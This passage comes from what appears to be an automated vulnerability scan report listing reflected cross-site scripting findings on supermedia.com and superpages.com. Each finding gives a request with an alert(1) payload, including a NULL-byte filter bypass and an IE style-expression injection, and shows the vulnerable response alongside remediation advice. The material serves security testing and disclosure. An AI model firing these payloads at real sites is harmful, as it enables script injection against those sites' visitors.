User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 17:05:45 GMT
Set-Cookie: JSESSIONID=63B1953F08BCF0514CDCD4855AE3E1E8.app7-a1; Path=/
Set-Cookie: trafficSource=SP; Expires=Sat, 05-Mar-2011 17:05:41 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 17:05:41 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Your Business Profile | SuperMedia.com Advertising</title>



...[SNIP]...
4="";
s.prop25="";
s.prop26="";
s.prop27="";
s.prop28="";
s.prop29="";
s.prop30="";
/* Conversion Variables */
s.zip="";
s.purchaseID="";
s.state="";
s.events="";
s.campaign="BP:Update Your Profile Topb7d7a";alert(1)//5f4e0e8915";
s.products="";
s.eVar1="";
s.eVar2="SP";
s.eVar3="";
s.eVar4="";
s.eVar5="";
s.eVar6="";
s.eVar7="";
s.eVar8="";
s.eVar9="";
s.eVar10="";
s.eVar11="";
s.eVar12="";
s.eVar13="";
s.eVar14="";
s.eVar15
...[SNIP]...

4.507. http://www.supermedia.com/business-listings/business-profile [campaignId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /business-listings/business-profile

Issue detail

The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00647f4"%3balert(1)//acd0e29ec22 was submitted in the campaignId parameter. This input was echoed as 647f4";alert(1)//acd0e29ec22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /business-listings/business-profile?&tsrc=SP&campaignId=BP:Update+Your+Profile+Top%00647f4"%3balert(1)//acd0e29ec22 HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:16:48 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Your Business Profile | SuperMedia.com Advertising</title>



...[SNIP]...
="";
s.prop25="";
s.prop26="";
s.prop27="";
s.prop28="";
s.prop29="";
s.prop30="";
/* Conversion Variables */
s.zip="";
s.purchaseID="";
s.state="";
s.events="";
s.campaign="BP:Update Your Profile Top.647f4";alert(1)//acd0e29ec22";
s.products="";
s.eVar1="";
s.eVar2="SP";
s.eVar3="";
s.eVar4="";
s.eVar5="";
s.eVar6="";
s.eVar7="";
s.eVar8="";
s.eVar9="";
s.eVar10="";
s.eVar11="";
s.eVar12="";
s.eVar13="";
s.eVar14="";
s.eVar15
...[SNIP]...

4.508. http://www.supermedia.com/online-advertising [campaignId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /online-advertising

Issue detail

The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f17b"%3balert(1)//351308f1023 was submitted in the campaignId parameter. This input was echoed as 6f17b";alert(1)//351308f1023 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online-advertising?tsrc=SP&campaignId=SP_FT_AdvertiseWithUs6f17b"%3balert(1)//351308f1023 HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:16:33 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Local Search Marketing | SuperMedia.com Advertising</title>



...[SNIP]...
prop24="";
s.prop25="";
s.prop26="";
s.prop27="";
s.prop28="";
s.prop29="";
s.prop30="";
/* Conversion Variables */
s.zip="";
s.purchaseID="";
s.state="";
s.events="";
s.campaign="SP_FT_AdvertiseWithUs6f17b";alert(1)//351308f1023";
s.products="";
s.eVar1="";
s.eVar2="SP";
s.eVar3="";
s.eVar4="";
s.eVar5="";
s.eVar6="";
s.eVar7="";
s.eVar8="";
s.eVar9="";
s.eVar10="";
s.eVar11="";
s.eVar12="";
s.eVar13="";
s.eVar14="";
s.eVar15
...[SNIP]...

4.509. http://www.supermedia.com/online-advertising [tsrc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /online-advertising

Issue detail

The value of the tsrc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9e22"%3balert(1)//51aaefb74c6 was submitted in the tsrc parameter. This input was echoed as b9e22";alert(1)//51aaefb74c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online-advertising?tsrc=SPb9e22"%3balert(1)//51aaefb74c6&campaingnId=SP_listing_header HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:16:13 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Local Search Marketing | SuperMedia.com Advertising</title>



...[SNIP]...
"";
s.prop26="";
s.prop27="";
s.prop28="";
s.prop29="";
s.prop30="";
/* Conversion Variables */
s.zip="";
s.purchaseID="";
s.state="";
s.events="";
s.campaign="";
s.products="";
s.eVar1="";
s.eVar2="SPb9e22";alert(1)//51aaefb74c6";
s.eVar3="";
s.eVar4="";
s.eVar5="";
s.eVar6="";
s.eVar7="";
s.eVar8="";
s.eVar9="";
s.eVar10="";
s.eVar11="";
s.eVar12="";
s.eVar13="";
s.eVar14="";
s.eVar15="";
s.eVar16="";
s.eVar17="";
s.eVar18="
...[SNIP]...

4.510. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b3044--><script>alert(1)</script>9a336ccd25a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?b3044--><script>alert(1)</script>9a336ccd25a=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:20 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:20 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<a href="?SRC=&b3044--><script>alert(1)</script>9a336ccd25a=1#" rel="nofollow">
...[SNIP]...

4.511. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab2fa"><script>alert(1)</script>887ac555049 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ab2fa"><script>alert(1)</script>887ac555049=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:12 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:14 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<link media="screen, projection" type="text/css" HREF="http://www.superpages.com/css/header.css?SRC=&ab2fa"><script>alert(1)</script>887ac555049=1" rel="stylesheet" />
...[SNIP]...

4.512. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c040f'-alert(1)-'b2565b0ba7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?c040f'-alert(1)-'b2565b0ba7=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:16 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:16 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<a HREF="http://mapserver.superpages.com/mapbasedsearch/?spheader=true&L='+L_encoded+'&SRC=&c040f'-alert(1)-'b2565b0ba7=1" rel="nofollow">
...[SNIP]...

4.513. http://www.superpages.com/bp/Facebook [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/Facebook

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce45f"-alert(1)-"161ba1e0a00 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/Facebookce45f"-alert(1)-"161ba1e0a00 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=F81968BB9B8C6E79A245B67095187467; Path=/
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 57268
Date: Thu, 03 Feb 2011 17:06:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
ellowpages.superpages.com';
var var_account = 'Superpagescom';
var hostServ = 'http://www.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://www.superpages.com/bp/Facebookce45f"-alert(1)-"161ba1e0a00?=";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

4.514. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [PGID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the PGID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e44e9"-alert(1)-"ac1eec3d3bf was submitted in the PGID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855e44e9"-alert(1)-"ac1eec3d3bf&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750566133-www.superpages.com-18392944-855020; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:29:26 GMT; Path=/
Set-Cookie: JSESSIONID=15DD6E10C9F988449C56134A74598F9A; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:29:25 GMT
Content-Length: 66686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank in Philad
...[SNIP]...
ype="two";
searchtype="two";
var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855e44e9"-alert(1)-"ac1eec3d3bf&bidType=CLIK&TR=1";
var client_id = "133515049997773";
var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile';
//-->
...[SNIP]...

4.515. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f735"-alert(1)-"5e13c75896f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US9f735"-alert(1)-"5e13c75896f/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750717878-www.superpages.com-25570824-638833; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:31:57 GMT; Path=/
Set-Cookie: JSESSIONID=5C32A1099510A145A292891057754A90; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:57 GMT
Content-Length: 66498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank in Philad
...[SNIP]...
tp://yellowpages.superpages.com';
var var_account = 'Superpagescom';
var hostServ = 'http://www.superpages.com';
var searchtype="two";
searchtype="two";
var actualUrl = "http://www.superpages.com/bp/US9f735"-alert(1)-"5e13c75896f/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1";
var client_id = "133515049997773";
var redirecturl = 'ht
...[SNIP]...

4.516. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb7a3"-alert(1)-"d9426b3b370 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htmbb7a3"-alert(1)-"d9426b3b370?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750760787-www.superpages.com-11101702-780397; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:32:40 GMT; Path=/
Set-Cookie: JSESSIONID=82629E94B8FADDDBFF9B5C6A1B6BECC4; Path=/
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:40 GMT
Content-Length: 18489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
gescom';
var hostServ = 'http://www.superpages.com';
var searchtype="two";
searchtype="two";
var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htmbb7a3"-alert(1)-"d9426b3b370?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

4.517. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [SRC parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the SRC request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ebe9"%3balert(1)//fc3f4c0a516 was submitted in the SRC parameter. This input was echoed as 3ebe9";alert(1)//fc3f4c0a516 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a3ebe9"%3balert(1)//fc3f4c0a516&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750452826-www.superpages.com-16809597-702534; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:27:32 GMT; Path=/
Set-Cookie: JSESSIONID=4CDE972A6F7062265EBD4234C3250381; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:27:33 GMT
Content-Length: 126537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
ww.superpages.com";
s.prop5 = "Advanced Search, Business Profile";
s.prop9 = "Advanced Search";
s.eVar23 = "Advanced Search";
s.hier1 = "Advanced Search, Business Profile";
var s_campaign = "comlocal1a3ebe9";alert(1)//fc3f4c0a516";
if(s_campaign){
s.campaign = s_campaign;
}
var s_code = s.t();
if(s_code)
document.writeln(s_code);
//-->
...[SNIP]...

4.518. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [SRC parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the SRC request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c3a4"style%3d"x%3aexpression(alert(1))"d28cbb2cb02 was submitted in the SRC parameter. This input was echoed as 8c3a4"style="x:expression(alert(1))"d28cbb2cb02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a8c3a4"style%3d"x%3aexpression(alert(1))"d28cbb2cb02&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750439498-www.superpages.com-4789827-628076; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:27:19 GMT; Path=/
Set-Cookie: JSESSIONID=8C15D1E521D5C7BAD68D0A53F9577955; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:27:18 GMT
Content-Length: 128435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a href="http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toBusinesses&SRC=comlocal1a8c3a4"style="x:expression(alert(1))"d28cbb2cb02" rel="nofollow" onClick="clickTrackTabs('GT','MySuperpages', 'yp_profile');">
...[SNIP]...

